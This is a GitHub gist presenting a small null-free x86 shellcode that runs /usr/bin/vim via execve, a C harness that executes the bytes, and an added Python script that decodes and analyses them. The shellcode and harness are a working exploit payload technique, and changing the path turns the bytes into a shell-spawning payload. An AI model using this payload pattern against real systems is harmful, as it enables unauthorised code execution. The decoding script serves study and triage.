Gist 0/b67302de3239dfc736da, created July 20, 2014 05:12
**README.md**

# x86 shellcode

Back in 2010, I needed some shellcode, so I wrote this. It spawns Vim rather than a shell, so I guess it's technically "vimcode". It is, of course, null-free. There is a commented version in the test file, but here it is in its entirety:

```
\x31\xc0\x31\xc9\x99\x50\x68\x2f\x76\x69\x6d\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xb0\x0b\xcd\x80
```

## Usage

This is 32-bit shellcode, so if you want to run the test file on x86_64, you'll need multilib GCC:

```
gcc -m32 -o test test.c
```

**test.c**

```c
// Build as described in the README: gcc -m32 -o test test.c
// Note: a modern toolchain maps .rodata (where this const array lives)
// non-executable, so the indirect call below faults under NX unless the
// test build deliberately relaxes that protection.
const char shellcode[] =
    "\x31\xc0"              // xor %eax, %eax     a = 0
    "\x31\xc9"              // xor %ecx, %ecx     c = 0 (*argv[])
    "\x99"                  // cdq                d = 0 (*envp[])
    "\x50"                  // push %eax          (push the null-terminated
    "\x68\x2f\x76\x69\x6d"  // push $0x6d69762f    string "/usr/bin/vim")
    "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
    "\x68\x2f\x75\x73\x72"  // push $0x7273752f
    "\x89\xe3"              // mov %esp, %ebx     b = &filename
    "\xb0\x0b"              // mov $0x0b, %al     a = 11 (execve)
    "\xcd\x80";             // int $0x80          syscall

int main(void)
{
    ((void (*)()) shellcode)();
    return 0;
}
```
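The commented listing above is the kind of thing an analyst wants to produce from an unknown byte string, not type out by hand. The following Python is an added example (not part of the gist) that does that for the push-immediate pattern used here: it checks the bytes for NULs, decodes the small opcode subset the sample uses into AT&T syntax, rebuilds the string the `push` instructions leave on the stack, and reports the syscall number loaded into `%al` before `int $0x80`. The 27 sample bytes are embedded so it runs offline; the decoder and the two-entry syscall table are assumptions limited to what the page shows, so it stops at any opcode outside that subset rather than pretending to be a general disassembler.

```python
"""Static analysis of the push-immediate shellcode shown above.

Added example, not part of the gist: the decoder covers only the opcode
subset the 27-byte sample uses (register-form xor/mov, cdq, push reg,
push imm32, mov imm8 to an 8-bit register, int imm8) and stops at
anything else, so it is a triage helper, not a general disassembler.
"""
import struct

# The 27 bytes from the README, embedded here so the script runs offline.
SHELLCODE = bytes.fromhex(
    "31c031c99950682f76696d682f62696e682f75737289e3b00bcd80"
)

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
# i386 syscall numbers this helper knows; 11 is the one the sample uses.
SYSCALLS = {1: "exit", 11: "execve"}


def decode(code):
    """Return a list of dicts {off, text, imm} in AT&T syntax; imm is the
    immediate operand (int) where one exists, otherwise None."""
    insns = []
    i = 0
    while i < len(code):
        op = code[i]
        nxt = code[i + 1] if i + 1 < len(code) else None
        if op in (0x31, 0x89) and nxt is not None and nxt >> 6 == 3:
            # xor/mov r/m32, r32 with mod=11: the reg field is the source,
            # the r/m field the destination
            src, dst = REG32[(nxt >> 3) & 7], REG32[nxt & 7]
            mn = "xor" if op == 0x31 else "mov"
            insns.append({"off": i, "text": f"{mn} %{src}, %{dst}", "imm": None})
            i += 2
        elif op == 0x99:                        # cdq: sign-extend eax into edx
            insns.append({"off": i, "text": "cdq", "imm": None})
            i += 1
        elif 0x50 <= op <= 0x57:                # push r32
            insns.append({"off": i, "text": f"push %{REG32[op - 0x50]}", "imm": None})
            i += 1
        elif op == 0x68 and i + 4 < len(code):  # push imm32 (little-endian)
            imm = struct.unpack_from("<I", code, i + 1)[0]
            insns.append({"off": i, "text": f"push $0x{imm:08x}", "imm": imm})
            i += 5
        elif 0xB0 <= op <= 0xB7 and nxt is not None:  # mov imm8, r8
            insns.append({"off": i, "text": f"mov $0x{nxt:02x}, %{REG8[op - 0xB0]}", "imm": nxt})
            i += 2
        elif op == 0xCD and nxt is not None:    # int imm8
            insns.append({"off": i, "text": f"int $0x{nxt:02x}", "imm": nxt})
            i += 2
        else:                                   # outside the known subset: stop
            insns.append({"off": i, "text": f".byte 0x{op:02x}  # not decoded", "imm": None})
            break
    return insns


def has_nul(code):
    """True if the byte string contains 0x00, which a C-string copy would truncate on."""
    return b"\x00" in code


def recover_stack_string(insns):
    """Rebuild the string a run of `push imm32` leaves on the stack. The
    stack grows downward, so the last push sits at the lowest address: the
    string is the little-endian chunks concatenated in reverse order."""
    chunks = [ins["imm"].to_bytes(4, "little")
              for ins in insns if ins["text"].startswith("push $")]
    return b"".join(reversed(chunks)).rstrip(b"\x00").decode("ascii", "replace")


def syscall_number(insns):
    """Return the value last loaded into %al before the first `int $0x80`."""
    last_imm = None
    for ins in insns:
        if ins["text"].startswith("mov $") and ins["text"].endswith("%al"):
            last_imm = ins["imm"]
        elif ins["text"] == "int $0x80":
            return last_imm
    return None


if __name__ == "__main__":
    insns = decode(SHELLCODE)
    for ins in insns:
        print(f"{ins['off']:3d}: {ins['text']}")
    print("null-free:", not has_nul(SHELLCODE))
    print("stack string:", recover_stack_string(insns))
    n = syscall_number(insns)
    print("syscall:", n, SYSCALLS.get(n, "unknown"))
```

Run as a script it prints the same ten instructions as the comments in `test.c`, confirms there is no 0x00 byte, recovers `/usr/bin/vim` from the three pushes (in reverse push order, because the stack grows down), and maps the `0x0b` loaded into `%al` to `execve`. The reversed-chunk step is the one detail worth remembering when reading this pattern in a capture: the path appears backwards in the bytes.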